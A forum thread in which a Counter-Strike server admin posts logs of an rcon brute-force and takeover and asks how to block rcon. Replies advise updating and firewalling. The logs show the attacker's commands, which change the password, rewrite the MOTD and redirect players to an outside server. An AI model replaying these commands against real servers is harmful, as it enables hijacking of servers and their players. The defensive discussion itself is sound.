Raised This Month: $ Target: $400
 0% 

Block rcon absolutely


Post New Thread Reply   
 
Thread Tools Display Modes
Author Message
alonelive
Senior Member
Join Date: Jan 2011
Location: Big snow country.. :)
Old 07-02-2013 , 12:35   Block rcon absolutely
Reply With Quote #1

Hello..
Today i saw new exploit (perhaps he is 1 or 2 days old (count of servers with changed hostname increases by every minute)).

I have rcon_password "", but..
This is a small part of logs.. And this exploit works! My cvars was changed..


PHP Code:
    Line 274L 07/02/2013 16:43:20Bad Rcon"rcon 1424349015 "mamma" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 347L 07/02/2013 16:45:47Bad Rcon"rcon 1424349015 "bankjob" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 477L 07/02/2013 16:48:13Bad Rcon"rcon 1424349015 "bank" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 586L 07/02/2013 16:50:39Bad Rcon"rcon 1424349015 "quantum" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 663L 07/02/2013 16:53:06Bad Rcon"rcon 1424349015 "defiance" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 716L 07/02/2013 16:54:15Bad Rcon"rcon 348228890 "555555"  sv_contact "HLBrute 1.10"" from "128.75.147.209:1749"
    
Line 776L 07/02/2013 16:55:32Bad Rcon"rcon 1424349015 "jamesbond" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 891L 07/02/2013 16:57:58Bad Rcon"rcon 1424349015 "bond" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 967L 07/02/2013 17:00:25Bad Rcon"rcon 1424349015 "wanted" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 1051L 07/02/2013 17:02:49Rcon"rcon 2083628346 zhenya mp_timelimit 60" from "188.115.143.31:11599"
    
Line 1053L 07/02/2013 17:02:49Rcon"rcon 2083628346 zhenya hostname "-[KPbI}+{OnOJIb]- CS #1699"" from "188.115.143.31:11599"
    
Line 1054L 07/02/2013 17:02:49Rcon"rcon 2083628346 zhenya amx_rd_server cs.azazel.org.ua" from "188.115.143.31:11599"
    
Line 1055L 07/02/2013 17:02:49Rcon"rcon 2083628346 zhenya amx_rd_serverport 27015" from "188.115.143.31:11599"
    
Line 1056L 07/02/2013 17:02:49Rcon"rcon 2083628346 zhenya amx_rd_maxplayers 1" from "188.115.143.31:11599"
    
Line 1057L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya amx_execall Motdfile "valve.rc "" from "188.115.143.31:11599"
    
Line 1058L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya amx_execall Motd_write Connect cs.azazel.org.ua:27015" from "188.115.143.31:11599"
    
Line 1059L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya amx_execall Motdfile "motd.txt"" from "188.115.143.31:11599"
    
Line 1060L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya amx_execall ConNecT cs.azazel.org.ua:27017" from "188.115.143.31:11599"
    
Line 1061L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya amx_clexec @CT Motdfile "valve.rc "" from "188.115.143.31:11599"
    
Line 1062L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya amx_clexec @TERRORIST Motdfile "valve.rc "" from "188.115.143.31:11599"
    
Line 1063L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya amx_clexec @CT Motd_write Connect cs.azazel.org.ua:27015" from "188.115.143.31:11599"
    
Line 1064L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya amx_clexec @TERRORIST Motd_write Connect cs.azazel.org.ua:27015" from "188.115.143.31:11599"
    
Line 1065L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya amx_clexec @CT Motdfile "motd.txt"" from "188.115.143.31:11599"
    
Line 1066L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya amx_clexec @TERRORIST Motdfile "motd.txt"" from "188.115.143.31:11599"
    
Line 1067L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya amx_clexec @CT ConNecT cs.azazel.org.ua:27017" from "188.115.143.31:11599"
    
Line 1068L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya amx_clexec @TERRORIST ConNecT cs.azazel.org.ua:27017" from "188.115.143.31:11599"
    
Line 1069L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya amx_exec @A Motdfile "valve.rc "" from "188.115.143.31:11599"
    
Line 1070L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya amx_exec @A Motd_write Connect cs.azazel.org.ua:27015" from "188.115.143.31:11599"
    
Line 1071L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya amx_exec @A Motdfile "motd.txt"" from "188.115.143.31:11599"
    
Line 1072L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya amx_exec @A ConNecT cs.azazel.org.ua:27017" from "188.115.143.31:11599"
    
Line 1073L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya motdfile motd.txt" from "188.115.143.31:11599"
    
Line 1074L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya motd_write <html><meta http-equiv="content-type" content="text/htmlcharset=windows-1251"><center><h1>WELCOME TO ********************************************************************************* CS!</h1><h2>Let's play the game!</h2><img src="http://content.foto.mail.ru/mail/eduardsilin/_answers/i-214.jpg"><br><b>PwNeD by AzazeL</b></center>#2366</html>" from "188.115.143.31:11599"
    
Line 1075L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya pb_minbots 10" from "188.115.143.31:11599"
    
Line 1076L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya pb_fillserver 10" from "188.115.143.31:11599"
    
Line 1077L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya rcon_password krizhopol" from "188.115.143.31:11599"
    
Line 1077L 07/02/2013 17:02:50Rcon"rcon 2083628346 zhenya rcon_password krizhopol" from "188.115.143.31:11599"
    
Line 1078L 07/02/2013 17:02:50Bad Rcon"rcon 2083628346 zhenya sys_ticrate 5000" from "188.115.143.31:11599"
    
Line 1079L 07/02/2013 17:02:50Bad Rcon"rcon 2083628346 zhenya fps_max 300" from "188.115.143.31:11599"
    
Line 1080L 07/02/2013 17:02:51Bad Rcon"rcon 1424349015 "torino" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 1184L 07/02/2013 17:05:18Bad Rcon"rcon 1424349015 "grantorino" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 1326L 07/02/2013 17:07:44Bad Rcon"rcon 1424349015 "dark" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 1405L 07/02/2013 17:10:10Bad Rcon"rcon 1424349015 "kungfu" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 1484L 07/02/2013 17:12:37Bad Rcon"rcon 1424349015 "kungfupanda" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 1583L 07/02/2013 17:15:03Bad Rcon"rcon 1424349015 "jcvd" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 1614L 07/02/2013 17:15:58Bad Rcon"rcon 348228890 "111"  sv_contact "HLBrute 1.10"" from "128.75.147.209:1749"
    
Line 1645L 07/02/2013 17:17:29Bad Rcon"rcon 1424349015 "surfwise" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 1700L 07/02/2013 17:19:55Bad Rcon"rcon 1424349015 "milk" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 1762L 07/02/2013 17:22:22Bad Rcon"rcon 1424349015 "man" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 1849L 07/02/2013 17:24:48Bad Rcon"rcon 1424349015 "manonfire" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 1906L 07/02/2013 17:27:14Bad Rcon"rcon 1424349015 "walle" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 1997L 07/02/2013 17:29:41Bad Rcon"rcon 1424349015 "wrestling" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 2061L 07/02/2013 17:32:07Bad Rcon"rcon 1424349015 "wrestler" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 2169L 07/02/2013 17:34:33Bad Rcon"rcon 1424349015 "darkknight" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 2226L 07/02/2013 17:37:00Bad Rcon"rcon 1424349015 "milionaire" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 2296L 07/02/2013 17:39:26Bad Rcon"rcon 1424349015 "iron" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 2367L 07/02/2013 17:41:54Bad Rcon"rcon 1424349015 "september" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 2390L 07/02/2013 17:42:59Bad Rcon"rcon 348228890 "123123"  sv_contact "HLBrute 1.10"" from "128.75.147.209:1749"
    
Line 2430L 07/02/2013 17:44:20Bad Rcon"rcon 1424349015 "complicated" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 2489L 07/02/2013 17:46:47Bad Rcon"rcon 1424349015 "duplicity" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 2561L 07/02/2013 17:49:13Bad Rcon"rcon 1424349015 "ponyo" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 2647L 07/02/2013 17:51:40Bad Rcon"rcon 1424349015 "informant" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 2702L 07/02/2013 17:54:06Bad Rcon"rcon 1424349015 "tyson" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 2706L 07/02/2013 17:54:18Bad Rcon"rcon 2389070769 "1234567"  sv_contact "HLBrute 1.10"" from "194.84.234.29:50366"
    
Line 2761L 07/02/2013 17:56:32Bad Rcon"rcon 1424349015 "sherlock" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 2823L 07/02/2013 17:58:59Bad Rcon"rcon 1424349015 "holmes" sv_contact "HLXBrute"" from "95.142.109.218:58464"
    
Line 2888L 07/02/2013 18:01:25Bad Rcon"rcon 1424349015 "anvil" sv_contact "HLXBrute"" from "95.142.109.218:58464" 

PHP Code:
#include <amxmodx> 

#define PLUGIN_NAME        "Stop RCON" 
#define PLUGIN_VERSION        "1.0" 
#define PLUGIN_AUTHOR        "AMXX COMM" 

public plugin_init( ) 

    
register_pluginPLUGIN_NAMEPLUGIN_VERSIONPLUGIN_AUTHOR 
    
    
register_clcmd"rcon",            "cmd_block" )
    
register_clcmd"rcon_address",        "cmd_block" )
    
register_clcmd"rcon_port",        "cmd_block" )
    
register_clcmd"rcon_password",    "cmd_block" )



public 
cmd_blockid )
{
    return 
PLUGIN_HANDLED    

Is my code true?
__________________
sorry my bad english...
alonelive is offline
wickedd
Veteran Member
Join Date: Nov 2009
Old 07-02-2013 , 12:41   Re: Block rcon absolutely
Reply With Quote #2

The plugin is useless. If you want to block someone from using rcon you need a firewall or just set it to
rcon_password "". Also, from looking at your log, they all ready have/had your rcon password.
__________________
Just buy the fucking game!!!!
I hate No-Steamers and lazy ass people.

Last edited by wickedd; 07-02-2013 at 12:42.
wickedd is offline
YamiKaitou
Has a lovely bunch of coconuts
Join Date: Apr 2006
Location: Texas
Old 07-02-2013 , 12:43   Re: Block rcon absolutely
Reply With Quote #3

Update your server and change your rcon password. There is no way to block rcon besides removing the password or filtering it at the firewall
__________________
ProjectYami Laboratories

I do not browse the forums regularly anymore. If you need me for anything (asking questions or anything else), then PM me (be descriptive in your PM, message containing only a link to a thread will be ignored).

Last edited by YamiKaitou; 07-02-2013 at 12:43.
YamiKaitou is offline
alonelive
Senior Member
Join Date: Jan 2011
Location: Big snow country.. :)
Old 07-02-2013 , 12:47   Re: Block rcon absolutely
Reply With Quote #4

Quote:
rcon_password ""
I already have rcon_password "".

Help me please to make a rule:

PHP Code:
$IPT -A INPUT -p udp -m udp -m string --hex-string "RCON?" --algo kmp -j DROP 
__________________
sorry my bad english...

Last edited by alonelive; 07-02-2013 at 12:47.
alonelive is offline
YamiKaitou
Has a lovely bunch of coconuts
Join Date: Apr 2006
Location: Texas
Old 07-02-2013 , 12:51   Re: Block rcon absolutely
Reply With Quote #5

If rcon_password is already blank, then you either have a config that is changing it, a plugin that is changing it, or a server that was not installed using SteamCMD
__________________
ProjectYami Laboratories

I do not browse the forums regularly anymore. If you need me for anything (asking questions or anything else), then PM me (be descriptive in your PM, message containing only a link to a thread will be ignored).
YamiKaitou is offline
alonelive
Senior Member
Join Date: Jan 2011
Location: Big snow country.. :)
Old 07-02-2013 , 12:55   Re: Block rcon absolutely
Reply With Quote #6

I don't have some plugins with rcon commands. It's 100%. My server was installed with hldaupdatetool (now i can't update the server (some troubles with hosting-provider).
Help me to make rule to IPTables, PLEASE!
__________________
sorry my bad english...
alonelive is offline
YamiKaitou
Has a lovely bunch of coconuts
Join Date: Apr 2006
Location: Texas
Old 07-02-2013 , 13:48   Re: Block rcon absolutely
Reply With Quote #7

You are on your own with the IPTables rules. You can search around, maybe someone has already posted usable rules.

Otherwise, the only solution is to update your server using SteamCMD. There should be no issues and SteamCMD is easier to use and quicker to update than HLDSUpdateTool based on my experience with it.
__________________
ProjectYami Laboratories

I do not browse the forums regularly anymore. If you need me for anything (asking questions or anything else), then PM me (be descriptive in your PM, message containing only a link to a thread will be ignored).
YamiKaitou is offline
alonelive
Senior Member
Join Date: Jan 2011
Location: Big snow country.. :)
Old 07-02-2013 , 15:09   Re: Block rcon absolutely
Reply With Quote #8

What you say about this?
https://forums.alliedmods.net/showpo...29&postcount=9
__________________
sorry my bad english...
alonelive is offline
fysiks
Veteran Member
Join Date: Sep 2007
Location: Flatland, USA
Old 07-02-2013 , 15:13   Re: Block rcon absolutely
Reply With Quote #9

Quote:
Originally Posted by alonelive View Post
Did you try it? Does it work? Regardless of the answers to these question, we (Alliedmodders) can only support the latest version of the game released by Valve.
__________________
fysiks is offline
alonelive
Senior Member
Join Date: Jan 2011
Location: Big snow country.. :)
Old 07-02-2013 , 15:16   Re: Block rcon absolutely
Reply With Quote #10

Quote:
iptables -I INPUT -p udp -m string --algo kmp --string "rcon" -j DROP
This is a way (perhaps). I test this now..

Quote:
we (Alliedmodders) can only support the latest version of the game released by Valve.
be - be - be... you have to be kinder
__________________
sorry my bad english...

Last edited by alonelive; 07-02-2013 at 15:17.
alonelive is offline
Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 12:30.


Powered by vBulletin®
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
Theme made by Freecode